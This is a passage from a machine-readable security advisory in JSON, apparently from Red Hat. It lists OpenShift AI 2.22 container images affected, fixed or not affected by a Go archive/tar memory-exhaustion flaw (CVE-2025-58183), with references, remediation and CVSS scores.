"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2407258"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/tar package in the Go standard library. tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A specially crafted tar archive with a pax header indicating a big number of sparse regions can cause a Go program to try to allocate a large amount of memory, causing an out-of-memory condition and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/tar: Unbounded allocation when parsing GNU sparse map",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, an attacker needs to be able to process a specially crafted GNU tar pax 1.0 archive with the application using the archive/tar package. Additionally, this issue can cause the Go application to allocate a large amount of memory, eventually leading to an out-of-memory condition and resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-58183"
},
{
"category": "external",
"summary": "RHBZ#2407258",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2407258"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-58183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58183"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183"
},
{
"category": "external",
"summary": "https://go.dev/cl/709861",
"url": "https://go.dev/cl/709861"
},
{
"category": "external",
"summary": "https://go.dev/issue/75677",
"url": "https://go.dev/issue/75677"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI",
"url": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4014",
"url": "https://pkg.go.dev/vuln/GO-2025-4014"
}
],
"release_date": "2025-10-29T22:10:14.376000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/tar: Unbounded allocation when parsing GNU sparse map"
},
{
"cve": "CVE-2025-58754",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-09-12T02:00:53.897605+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
